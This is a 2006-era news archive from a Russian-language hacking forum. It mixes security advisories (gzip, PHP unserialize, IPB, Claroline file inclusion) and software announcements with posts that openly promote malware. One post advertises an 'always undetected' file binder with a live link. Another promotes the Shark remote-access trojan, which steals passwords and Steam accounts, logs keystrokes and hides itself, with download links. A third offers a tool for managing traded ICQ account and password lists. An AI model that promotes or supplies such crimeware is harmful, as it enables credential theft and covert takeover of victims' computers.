Архив новостей (2004-2015 год)

[Robin Gud]

Специалисты по вопросам компьютерной безопасности из компании FaceTime предупреждают о появлении новой вредоносной программы, распространяющейся через сеть обмена мгновенными сообщениями AOL Instant Messenger.

Вредоносная программа, получившая название W32.pipeline, маскируется под изображение в формате JPEG. Пользователю AOL Instant Messenger приходит сообщение примерно следующего содержания: "Эй, ты не будешь против, если я размещу эту твою фотографию в своём блоге?" При этом в тексте послания приводится ссылка, указывающая на некую "фотографию". Однако, попытавшись просмотреть изображение, пользователь, сам того не подозревая, запустит на выполнение вредоносный файл.

После активации W32.pipeline пытается разослать свои копии по адресам из книги контактов Instant Messenger. Таким образом, для получателя сообщение с большой вероятностью будет выглядеть исходящим от знакомого, родственника или коллеги по работе. Это повышает риск заражения. Кроме того, W32.pipeline соединяется с некими узлами в интернете и загружает на компьютер жертвы дополнительные вредоносные компоненты, в том числе руткиты и трояны.
Специалисты FaceTime подчёркивают, что посредством W32.pipeline злоумышленники пытаются создать сеть полностью контролируемых зомбированных компьютеров. Такая сеть может использоваться, например, для проведения распределённых DoS-атак на неугодные ресурсы или с целью организации массовых рассылок по электронной почте.

Пользователям рекомендуется не открывать ссылки, присланные через интернет-пейджеры, без получения подтверждения даже в том случае, если они, казалось бы, исходят от знакомых. Кроме того, не следует пренебрегать антивирусным программным обеспечением.

 

[Fallen]

Вышла финальная версия интернет-пейджера, разработки компании Yahoo!. Если посмотреть статистику популярности программ подобного плана, то можно увидеть, что Yahoo! Messenger занимает почётное третье место в мире, после таких программ, как: AIM и ICQ.

Это и не удивительно, ведь с помощью этой программы можно комфортно общаться через интернет, находить новых друзей, обмениваться файлами, отправлять и получать электронную почту, вести голосовую беседу, общаться с помощью веб-камеры и т.д. Работать с этим интернет-пейджером удобно из-за понятного и продуманного интерфейса, а также быстрого доступа к пользовательским настройкам. В этой версии улучшена работа встроенного сервиса голосовой почты (voicemail), улучшено совместное использование фотографий, добавлены новые смайлики.
Скачать|Download(9.83 МB)

 

[Great]

Множественные уязвимости в gzip
Многочисленные дистрибьюторы и разработчики Linux и FreeBSD выпустили новые пакеты обновления OpenSource-утилиты сжатия GNUzip. Обновление устраняет 4 уязвимости. Три из них основаны на переполнении буфера в функциях make_table (unlzh.c), build_tree (unpack.c), make_table (поддержка LHA). При распаковке заранее сготовленных архивов враждебный код может быть исполнен на компьютере в контексте текущего пользователя. Четвертая уязвимость находится в обработке LZH, которая просто вызывает крах.
Никакие официальные патчи не доступны в настоящее время. Пользователям следует установить пакеты для обновления как можно скорее.

Дата: 22.09.2006

 

[Ŧ1LAN]

Online Binder.
you can bind up to 5 files

options :[New$paN]

- the stub is always undetected
- custom icon
- upx file before binding
- upx the stub
- open a prog on the target pc with the file passed as parameter
- execute the binded exe hidden when launch the stub
- melt the stub
- custom filename
- predefined windows environnement var for install binded file path

you may have to wait 3 minutes for the step 3 as the stub is compiled each time

http://rgirardin.mine.nu/binder1.13/index.php

 

[Winux]

IBRapiDL - мгновенная закачка с рапиды
Открылся новый сервис от DaMaGeLaB. Сервис позволяет генерировать ссылки (с возможностью докачки!) на rapidshare.de. Сервис IBrapiDL доступен не для всех. Возможность им пользоваться досталась только юзерам халявы и людям с доступом больше чем модератор
Ищуться спонсоры премиум аккаунтов!
Думаю мы найдем общий язык.
З.Ы: просьба пока особо сервисом не злоупотреблять. Передача акка халявщиков ведет к исключению из раздела.
:zns2: IBrapiDL[New$paN]

 

[Spawn™]

Видеоуроки по работе в Photoshop, 3D Max[New$paN], Dreamweaver, Fireworks 8, Cpanel и кое–чему ещё


смотрим , наслаждаемся

 

[Winux]

Kaspersky 6 Emergency CD
http://xss.pro/files/kasp.gif
Весьма интересное предложение было высказано для быстрого сканирования и очистки компа от вирусов. Иногда запущеный трой весьма проблематично вырубить из процессов, так как он склеился или маскируется под системный фаил. Этот уникальный загрузочный диск поможет, не используя установленную винду (а следовательно автозагрузку и все загружаемые процессы) избавиться от вирей.

Use This Bootable CD & Repair Your System !

* Barts Stuff Test 5
* Network Support
* Kaspersky Internet Suite 6.0
* Disc Copy (Floppy)
* A43 File Manager
* Disk Part, and Check Disk
* Keyboard (Multi-Language) including U.S.
* Mouse Support and Drive Snapshot v1.36[New$paN]

Скачать|Download - часть 1
Скачать|Download - часть 2

Пароль: www.soft-hard.net

 

[Winux]

Torpark 1.5.0.7
http://xss.pro/files/news/topark.jpg
Торпарк - новый браузер, основанный на небезизвестном огнелисе. Крут этот браузер вовсе не тем, что может грузиться с флешки и не оставлять ненужных следов в системе (как огнелис портабл), а тем, что соединяется он с инетом через сеть TOR (The Onion Router), скрывающую IP-адрес пользователя.
Torpark не требует инсталляции и не оставляет следов ни на диске, не в реестре. Браузер может быть запущен даже с USB-карты, не сохраняя ничего на жестком диске.
Сеть TOR позволяет скрыть IP-адрес посетителя, служа посредником. Каждые несколько минут она меняет точку, через которую соединяется с серверами назначения. Более того, данные, между пользователем и сетью TOR шифруются, что исключает прослушивание трафика провайдером, включая запрашиваемые адреса.
Скриншот|Screenshot[New$paN]

Скачать|Download

 

[Spawn™]

eBoogle - новый сервис по поиску книг в рунете.

 

[Winux]

Static Explorer - весьма интереснак CMSка. Интересна она тем, что написана она не на php, не на перле, а на том самом JavaScript'е. Написан статик эксплорер почетным мембером нашего форума - east'ом, известным благодаря скандальному видео по взлому как Yast, а позже - izt.
У CMS есть возможность создавать динамическое содержимое, не только статей, но и фотоальбомов.
Разобраться с CMS не сможет только дурак, в ридми все написано. Сабж распространяется под лицензией GNU GPL.[New$paN]
Скачать|Download

 

[Spawn™]

SuSE Linux предлагает системы Linux для серверов и рабочих станций с целью удовлетворения потребностей крупных и малых предприятий. SuSE Linux Enterprise Server 8 для средних и крупных предприятий предоставляет основные сетевые службы с возможностями. Данная книга поможет вам разобратся в установки SuSE Linux, подробное описание и скриншоты, формат книги PDF

Закачка далее [New$paN]

Скачать|Download

 

[Spawn™]

Полная (бумажная) версия журнала «Мобильные Компьютеры» в pdf-формате, который посвящен самым современным устройствам: мобильным компьютерам, мобильным телефонам, а также ноутбукам. Журнал рассказывает обо всем, что так или иначе связано с мобильными технологиями тем, кому это интересно. Все последние новинки, тесты и обзоры, решения и полезные советы, а также большой каталог устройств. Редакция помогает читателю освоиться в мире мобильных устройств, дает конкретные бизнес решения по оптимизации процессов с помощью КПК, ноутбуков и смартфонов. Читателями журнала являются активные пользователи персональных и мобильных компьютеров, Интернет, современных средств мобильной связи, в том числе технологии SMS, WAP, GPRS

Содержание
- Новости
- Понаехали: CeBit 2.0 build 06

Выбираем
- Acer n300
- E-Ten G500
- I-mate JAMin
- HP iPAQ hw6915
- Asus W5F
- Sony VAIO SZ1-HRP
- Sony VAIO PCG-4G2P
- Samsung R65
- LG P1-5225R Express Dual
- Fujitsu Siemens LifeBook S2110
- Nokia 32
- Тест ноутбуков на Intel Core Duo

Используем
- Смартфоны НТС
- Покупаем ноутбук
- Что могут современные коммуникаторы?
- Калькуляторы для Pocket PC и Palm
- Базы данных для КПК

Закачка [New$paN]
Скачать|11.15Mb

 

[Winux]

ICQSafeBook - уникальная программа для работы со списками ICQ. Программа подойдет не только для продавцов, но и для обычных "рядовых" пользователей.

• работает c файлами вида uin;pass [emai] (*.txt), и с собственными форматом базы (*.isb)
• шифрование базы номеров. 6 алгоритмов: IDEA (128bit), Twofish (256bit), ГОСТ 28147-89 (256bit), AES (256bit), RC6 (2048bit), Diamond II (2048bit)
• работа по ICQ-протоколу (проверка и смена паролей, информации, проверка на невидимость номера, встроенный ICQ-клиент)
• гибкая система фильтров и поиска
• сортировка базы по множетву параметров
• хранение общирной информации о номере
• поддержка горячих клавиш
• интеграция в оболочку (Windows shell)

Программа платная. Демо версию и информацию о цене можно узнать на :zns2: домашней странице программы. Ограничения демо версии - максимальное колличество номеров - 5.
ВНИМАНИЕ! Для посетителей xss.pro/ (те у кого есть 20 сообщений на форуме) скидка 25%. Просто скажите при покупке.[New$paN]

 

[ettee]

Linux глазами хакера

Автор: Фленов М.Е.

В простой и доходчивой форме описываются потенциальные уязвимости Linux и рекомендации по предотвращению атак, даётся описание настройки прав доступа и конфигурирование сетевого экрана. Рассматриваются вопросы настройки ОС на максимальную производительность и безопасность. К этой книге Фленов отнёсся более серьёзно. Автор благодарит своего кота, умещает соображения на тему "кто такие Хакеры" на двух страницах, после чего переходит к делу и старательно рассказывает, что угрожает сетисерверу на базе ОС Linux и как с этим бороться (причём весьма доходчиво), по возможности приводит практические и реальные примеры.[New$paN]

 

[Great]

WEB 2.0 – атака по технологиям «по-русски»!

Первая российская WEB 2.0 технология по обработке цифровых изображений Smilart Fan Studio прошла тест на «отношение Пользователя» в сетях Рунета и продолжает представлять свой сервис всем посетителям и фотолюбителям всемирной сети интернет. Фоторедактор Fan Studio теперь имеет англоязычный интерфейс, понятный и доступный пользователям других стран.
Технологии WEB 2.0 являются одними из ключевых направлений во всемирных эволюционных разработках. Все большее и большее количество людей обращают свое внимание и начинают постоянно пользоваться данными онлайн сервисами.
Российский интернет проект Fan Studio показал, что наши соотечественники так же не стоят на месте. Недавно стартовавшая разработка с первых дней привлекла своей идеей огромную аудиторию, которая растет с каждым днем. Проект постоянно развивается, увеличивая свои возможности в обработке фотографий и интригует своих пользователей реализацией своих новых идей.

Контактная информация:
Альмира Сарсеева
Руководитель отдела продвижения
Компания Smilart Ltd (UK)
тел: +7 495 542 2930
e-mail: :mail: almira@smilart.com
ICQ: 296601347
:zns2: Домашняя страница www.fanstudio.ru
:zns2: Домашняя страница www.smilart.com

 

[Ŧ1LAN]

Shark 0.4.
Довольно интересная зверушка со множестом приятных функций.
вот лишь некторые из них:
- Grabbing Protected Storage Passes and MSN/Yahoo/Trillian/Miranda/ICQ Passes
- Filebinder in the Server-Builder with more features (SPOILER/show start, parameters)
- scrollbars in fullscreen-capture
- Delayed Start possible
- Feature to mark/demark server
- Thumbnail-Preview more stable and faster
[New$paN]
Скриншот|Screenshot (SIN-Console)
Скриншот|Screenshot (Chat)
Скриншот|Screenshot (Filemanager (hot))
Скриншот|Screenshot (keylogger (hot))

список изменений для 4ой версии
- Fixed: Scrollbars in Fullscreenmode-Missing bug
- you can download a complete folder in filemanager
- Hotkey for Pic-Preview: CTRL+Y
- Hotkey for downloading dirs: CTRL+D
- Pimped Thumbnail Preview up (need new server to work correctly)- Styled up Transfer-Manager
- Server now compiled as native-code (easier to stealth)
- changed "users:" to "Servers:" in statusbar
- Fixed: Ping-Timeout bugs
- Fixed: Removing Server is working now 100%
- Client is showing version number of server in SIN-Console
- You can Update Servers (also works with 0.3 servers)
- Pimped Transfer Manager
- You can grab Dialup Passes
- Server is deleting temporary files (audio streaming)
- Audiostreaming has own dir
- Activate after first reboot fixed!
- You can read out Steam-Accounts
- Keylogger MUCH more stable than in 0.2 servers
красным выделены только те вещи которые работают с версией 0.4 => с 0.3 и более ранними версиями работать не будет.
Скриншот|Screenshot
Скриншот|Screenshot
Скачать|Download (0.4)
Скачать|Download (0.3)

 

[Winux]

Новый сервис Google Code Search ищет опубликованные в Сети коды программ
http://news.xss.pro/google_code_search.gif
Google объявил о запуске поиска, который оценят программисты. Новый сервис Google Code Search ищет опубликованные в Сети коды программ.
Ссылки на подобные материалы достаточно трудно найти, однако, как говорит менеджер Google Том Стоки (Tom Stocky), "долгое время эта проблема не находила решения".
Сообщается также, что для поиска таких сведений Google будет применять те же самые технологии, что использовались для поиска по обычным текстам, книгам, видео и картинкам.
Теперь разработчики различного программного обеспечения смогут найти интересующие их коды по ключевым словам, которые вводятся в привычное текстовое поле. К примеру, можно без особого труда делать поисковые запросы наподобие "go{2}gle" "hello,\ world" или "^int printk", что раньше не дало бы желаемых результатов.
Также Google сообщает, что новый сервис позволяет производить поиск по архивам (.tar.gz, .tar.bz2, .tar, .zip) и репозиториям.
При поиске по коду, в результатах выводится несколько строк кода и ссылка на файл с исходным кодом.[New$paN]

 

[Great]

​

Развивая сообщения прошлой недели об уязвимости в PHP, Штефан Эсзер опубликовал информацию об уязвимости, содержащюю дальнейшие подробности. Он сообщает там, что целочисленное переполнение ecalloc() функции ZendEngine1 может быть вызвано из-за специальных пользовательских данных, которые обработанных с помощью функции unserialize(). Эта функция используется прилодениями PHP такими, как phpBB2, Invision Power Board, vBulletin и Serendpity. Атакующий может использовать специально подготовленные cookies, чтобы внедрить код и затем выполнить его с привиллегиями пользователя. Эссер утверждает, что разработал эксплоит Proof-of-Concept, который запускает внедренный код. Подобная уязвимость в unserialize() была обнаружена в конце 2004.

Уязвимость затрагивает PHP 5 версий до 5.1.6 и PHP 4 до 4.3.0. Начиная с 4.3.0, по крайней мере в PHP4, защита существовала в ZendEngine1, чтобы принять меры против последствий целочисленного переполнения в ecalloc (), сообщает Эссен. Он также отмечает, что уязвимость была устранена в PHP CVS, но никакое обновление не будет выпущено. Пользователи должны вместо этого установить патч, выпущенный Hardened PHP Project или ждать PHP 5.2.0. Эссер планирует опубликовать его эксплоит, как только эта версия будет доступна.

 

[Great]

Межсайтовое выполнение сценариев в Invision Power Board

Программа: Invision Power Board 2.1.7, возможно более ранние версии.
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код сценария в контексте сессии целевого пользователя.

Уязвимость существует из-за того, что административный интерфейс позволяет произвести некоторые действия без проверки валидности запроса. Удаленный пользователь может с помощью специально сформированного аватара выполнить произвольный SQL запрос в базе данных приложения когда пользователь с административными привилегиями просматривает специально сформированное изображение в Admin CP.

:zns2: Производитель

Решение: Установите исправление с сайта производителя.

Источник: SecurityLab

 

[ENFIX]

Claroline - php-including
Дата Выпуска: 2006-10-11
Уровень: Высоко критический
Решение: Неисправленно
Программное обеспечение: Claroline 1.x

Описание:
Входящие данные в параметре "includePath" в claroline/inc/lib/import.lib.php, должным образом не проверяются при инклуде локальных файлов. Уязвимость позволяет заинклудить внешний скрипт.

Уязвимость можно эксплуатировать, если "register_globals" включен.
Источник: secunia.com